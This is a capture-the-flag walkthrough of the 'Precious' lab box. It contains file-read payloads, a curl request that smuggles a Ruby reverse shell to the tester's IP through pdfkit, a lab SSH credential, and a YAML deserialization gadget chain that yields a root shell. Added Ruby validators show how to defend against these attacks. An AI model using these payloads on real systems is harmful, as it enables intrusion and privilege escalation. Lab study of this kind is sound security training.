Precious
Personal Rating: Medium
Enumeration
sudo nmap -sV <IP>
Only ssh and port 80 open
There is a page where you are supposed to enter a URL and get it converted to a PDF.
nginx and Phusion Passenger 6.0.15
Subdomain scan, directory scan and vhost scan revealed nothing at all.
On the web page, when I fetch an HTML page that I created and host on my machine, I get a PDF file as output. I will try to include files with JavaScript.
I created a test HTML file with JavaScript in it. A PDF rendered from this content shows whether the script ran:
<!DOCTYPE html>
<html>
<body>
<div id="main">The JS was not executed</div>
</body>
<script>
div = document.getElementById('main');
div.innerHTML = "The JS was executed";
</script>
</html>
Server Side XSS?
The vulnerability would be a server-side XSS: you can make the web handler execute code, not in the browser of a user who accesses the website, but on the server itself. I found a list of LFI payloads to test:
<!DOCTYPE html>
<html>
<body>
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send();
</script>
<script>
xhzeem = new XMLHttpRequest();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
xhzeem.open("GET","file:///etc/passwd");
xhzeem.send();
</script>
<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<link rel=attachment href="file:///root/secret.txt">
<object data="file:///etc/passwd">
<portal src="file:///etc/passwd" id=portal>
</body>
</html>
I am loading this with http://10.10.16.7:8000/test.html
This seems to make the server not output a PDF anymore, so I removed it:
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
The script collection above actually returned nothing when sent to the server.
Exifdata pdfkit Exploit Reveal
I checked the resulting PDF with exiftool and found out that it was generated by a vulnerable pdfkit version. This is not the way that I expected. I learned that it is important to test and enumerate broadly before spending too long on an exploit path that does not work.
The pdfkit version is vulnerable to a Ruby code injection: https://www.ctfiot.com/84447.html
This was the command that did the exploit:
curl 'http://precious.htb/' \
  -X POST \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' \
  -H 'Accept-Language: en-US,en;q=0.5' \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Origin: http://precious.htb/' \
  -H 'Connection: keep-alive' \
  -H 'Referer: http://precious.htb/' \
  -H 'Upgrade-Insecure-Requests: 1' \
  --data-raw 'url=http%3A%2F%2F10.10.16.7%3A8000%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%2210.10.16.7%22%2C4444%29%29%27%60' \
  --output soos.txt
I got a shell with that actually.
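Both paths tried against the PDF app (the file:// payloads from the LFI section and the URL that carried the shell command into pdfkit) arrive through the same form field, so the server-side control a defender wants is a strict check on that URL before any renderer sees it. The following is an added example, not the Precious application's code and not pdfkit's: a Ruby allowlist validator that admits only http/https URLs with a host and made of RFC 3986 characters, so spaces, backticks and quotes are refused up front. The function name, error class and length limit are assumptions for the example. This is defence in depth next to updating the vulnerable pdfkit, not a substitute for the update.

```ruby
require 'uri'

# Characters a client-supplied URL may contain once it is percent-encoded:
# RFC 3986 unreserved and reserved characters plus '%'. Spaces, backticks,
# quotes and other shell metacharacters are deliberately not in the set.
URL_CHARS = %r{\A[A-Za-z0-9\-._~:/?\[\]@!$&'()*+,;=%#]+\z}
MAX_URL_LENGTH = 2048 # assumed limit for this example

class RenderUrlError < ArgumentError; end

# Returns the URL as a String if it is acceptable to hand to the renderer,
# raises RenderUrlError otherwise. Only http and https URLs with a host pass;
# file:// and every other scheme are refused before anything is fetched.
def validate_render_url(input)
  raise RenderUrlError, "empty url" if input.nil? || input.empty?
  raise RenderUrlError, "url too long" if input.length > MAX_URL_LENGTH
  raise RenderUrlError, "url contains illegal characters" unless URL_CHARS.match?(input)

  uri = begin
    URI.parse(input)
  rescue URI::InvalidURIError => e
    raise RenderUrlError, "unparsable url: #{e.message}"
  end
  # URI::HTTPS is a subclass of URI::HTTP, so this admits both schemes.
  raise RenderUrlError, "scheme #{uri.scheme.inspect} not allowed" unless uri.is_a?(URI::HTTP)
  raise RenderUrlError, "url has no host" if uri.host.nil? || uri.host.empty?
  uri.to_s
end

if __FILE__ == $PROGRAM_NAME
  samples = [
    "http://10.10.16.7:8000/test.html",    # the legitimate test page from the writeup
    "file:///etc/passwd",                   # the local-file attempts from the LFI section
    "http://10.10.16.7:8000/?name=%20`id`", # constructed: the shape of the injection payload
  ]
  samples.each do |s|
    begin
      puts "accepted: #{validate_render_url(s)}"
    rescue RenderUrlError => e
      puts "rejected: #{s.inspect} (#{e.message})"
    end
  end
end
```

The allowlist is applied to the raw string before parsing on purpose: URI.parse is lenient about what it accepts, and the injection here depends on characters that a percent-encoded URL never needs to contain.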
With this I could upgrade it to a real tty:
python3 -c 'import pty; pty.spawn("/bin/bash")'
There is the user “henry”. I cannot read the user.txt yet as I am the ruby user.
Internal Enumeration
I ran linPEAS:
- Potentially Vulnerable to CVE-2022-0847
- Potentially Vulnerable to CVE-2022-2588
- CVE-2022-0847
NOPE - sudo version?
NOPE - /etc/nginx/sites-enabled/pdfapp.conf
NOPE - /usr/share/openssh/sshd_config
NOPE- /var/log/nginx/access.log
NOPE- /var/log/nginx/error.log
- /opt/sample
- ╔══════════╣ Executable files potentially added by user (limit 70)
2022-11-21+15:15:08.0729708500 /usr/local/sbin/laurel
2022-09-26+05:04:43.6880195170 /home/ruby/.bundle/config
2022-09-26+05:04:42.9800195060 /usr/local/bin/tilt
2022-09-26+05:04:42.8480195040 /usr/local/bin/rackup
2022-09-26+05:04:39.0520194460 /usr/local/bin/bundler
2022-09-26+05:04:39.0520194460 /usr/local/bin/bundle
NOPE - /tmp/passenger.YarIXDw/full_admin_password.txt
NOPE - /tmp/passenger.YarIXDw/read_only_admin_password.txt
<SNIP>
I got the creds henry:Q3c1AqGHtoI0aXAYFH from /home/ruby/.bundle/config. With that I could ssh onto the host.
Ruby SUID Dependency Update Exploit
With sudo -l I found this NOPASSWD entry:
(root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
After changing the PATH to include /home/henry and creating a file called dependencies.yml in it, I looked at the update_dependencies.rb file. It uses YAML.load(File.read..., which is apparently vulnerable to deserialization and can lead to code execution. I had to peek at the writeup for this as I got stuck.
I put this in the dependencies.yml:
--- !ruby/object:Gem::Requirement
requirements:
  !ruby/object:Gem::DependencyList
  specs:
  - !ruby/object:Gem::Source::SpecificFile
    spec: &1 !ruby/object:Gem::StubSpecification
      loaded_from: "/root/root.txt"
  - !ruby/object:Gem::Source::SpecificFile
    spec:
I wanted a shell as root, so I researched further.
In the end, this payload worked to get a root shell:
---
- !ruby/object:Gem::Installer
  i: x
- !ruby/object:Gem::SpecFetcher
  i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
        read: 0
        header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
        socket: &1 !ruby/object:Gem::RequestSet
          sets: !ruby/object:Net::WriteAdapter
            socket: !ruby/module 'Kernel'
            method_id: :system
          git_set: /bin/bash
        method_id: :resolve
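The root cause in update_dependencies.rb is that YAML.load honours "!ruby/object:" tags, so the file decides which classes get instantiated and the gadget chains above do the rest. The fix on the defending side is YAML.safe_load plus a shape check on the result. The following is an added example, not the script from the box: a hardened loader for a dependencies.yml of the assumed form "dependencies: {gem name => version}", side by side with the legacy loader so the difference is visible on a harmless class. Psych 4 (Ruby 3.1 and later) renamed the old behaviour to unsafe_load and made load safe by default, so the legacy helper calls whichever the installed Psych provides. The class Dep, the constants and the sample documents are constructed for the example.

```ruby
require 'yaml'

# Constructed sample in the shape the dependency file is assumed to have:
# a single "dependencies" mapping of gem name -> version string.
BENIGN_YAML = <<~YAML
  dependencies:
    pdfkit: "0.8.6"
    nokogiri: "1.13.0"
YAML

# A harmless class standing in for whatever a "!ruby/object:" tag names.
# With the legacy loader, Psych allocates it and sets its instance variables.
class Dep
  attr_accessor :name
end

# Constructed sample using the same tag mechanism as the payloads above,
# but pointing at the harmless class.
TAGGED_YAML = <<~YAML
  --- !ruby/object:Dep
  name: "x"
YAML

class DependencyFileError < StandardError; end

NAME_RE    = /\A[A-Za-z0-9_\-]+\z/
VERSION_RE = /\A[0-9]+(\.[0-9]+)*\z/

# Hardened loader: no Ruby object tags, no aliases, and the document must have
# exactly the expected shape. Returns a Hash of gem name => version.
def load_dependencies(yaml_text)
  data = begin
    YAML.safe_load(yaml_text, permitted_classes: [], aliases: false)
  rescue Psych::Exception => e
    raise DependencyFileError, "rejected by safe_load: #{e.class}"
  end
  deps = data.is_a?(Hash) && data.keys == ["dependencies"] ? data["dependencies"] : nil
  raise DependencyFileError, "expected a single 'dependencies' mapping" unless deps.is_a?(Hash)
  deps.each do |name, version|
    raise DependencyFileError, "bad gem name #{name.inspect}" unless name.is_a?(String) && NAME_RE.match?(name)
    raise DependencyFileError, "bad version for #{name}" unless version.is_a?(String) && VERSION_RE.match?(version)
  end
  deps
end

# The legacy pattern: a loader that honours "!ruby/object:" tags and therefore
# builds whatever class the file names. Returns the loaded object's class name
# to make the point visible without doing anything with the object.
def legacy_loaded_class(yaml_text)
  obj = YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(yaml_text) : YAML.load(yaml_text)
  obj.class.name
end

if __FILE__ == $PROGRAM_NAME
  p load_dependencies(BENIGN_YAML)
  puts "legacy loader built an instance of: #{legacy_loaded_class(TAGGED_YAML)}"
  begin
    load_dependencies(TAGGED_YAML)
  rescue DependencyFileError => e
    puts "hardened loader: #{e.message}"
  end
end
```

The shape check matters as much as safe_load: even with tags disabled, a script that then iterates over whatever structure came back can be steered by a file that is a list or a scalar where a mapping was expected.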